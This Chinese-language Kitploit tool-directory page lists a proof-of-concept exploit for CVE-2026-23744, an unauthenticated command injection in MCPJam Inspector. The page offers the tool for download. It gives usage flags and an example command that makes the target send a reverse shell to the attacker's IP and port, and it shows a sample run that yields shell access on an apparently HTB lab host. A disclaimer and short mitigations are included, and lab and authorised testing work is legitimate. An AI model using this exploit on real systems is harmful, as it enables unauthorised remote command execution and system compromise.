Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 是 MCPJam Inspector ≤1.4.2 中通过 /api/mcp/connect 存在的未认证命令注入漏洞。此 POC 通过发送特制的 JSON 载荷来利用该漏洞执行任意命令,从而获得带 PTY 的反向 shell。 | Kitploit
工具/GitHubGitHub/mluex0/cve-2026-23744-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubmluex0/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 是 MCPJam Inspector ≤1.4.2 中通过 /api/mcp/connect 存在的未认证命令注入漏洞。此 POC 通过发送特制的 JSON 载荷来利用该漏洞执行任意命令,从而获得带 PTY 的反向 shell。

查看仓库
351个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23744-PoC

免责声明:

本概念验证(PoC)仅供授权的安全研究、教育目的和受控实验室环境(例如 HTB、CTF 或经明确书面同意的内部渗透测试)使用。未经许可对任何系统进行未授权使用是非法且不道德的。作者对滥用不承担任何责任;用户应全权负责遵守所有适用法律法规。


描述

CVE-2026-23744 是 MCPJam Inspector(版本 ≤ 1.4.2)中的一个未认证命令注入漏洞。
/api/mcp/connect 端点接受包含 serverConfig.command 和 serverConfig.args 的 JSON 载荷,并直接将其传递给系统进程派生,期间没有任何清理。攻击者可发送精心构造的请求以执行任意系统命令,从而以服务用户权限获得反向 Shell。

本仓库包含一个完整可用的漏洞利用脚本,并带有一个可选的全自动基于 PTY 的交互式监听器(默认启用)。


要求

  • Python 3.6+
  • requests 库(pip install requests)

使用方法

重要提示: 只需提供主机名或 IP。脚本会自动添加 http:// 或 https://

python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
Option描述
-t, --target目标主机名或 IP(必填)
-p, --port目标端口(默认:6274)
-l, --lhost你的 IP,用于反向 Shell(必填)
-r, --lport你的监听端口(默认:4444)
--ssl使用 HTTPS 而非 HTTP
--check-only仅检查漏洞,不发送 Shell

示例

该脚本会启动自己的监听器,并直接在终端中为你提供一个 Shell。

python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

概念验证(成功运行)

$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

缓解措施

  • 对所有传递给进程派生函数的用户提供参数进行清理。
  • 未经严格白名单和认证,不得允许通过 API 端点执行任意命令。
  • 以最小权限运行服务 – 绝不要以 root 身份运行。

许可证

本仓库仅用于教育和授权测试目的。使用风险自负。

作者: Mluex0
日期: 2026 年 8 月

下载工具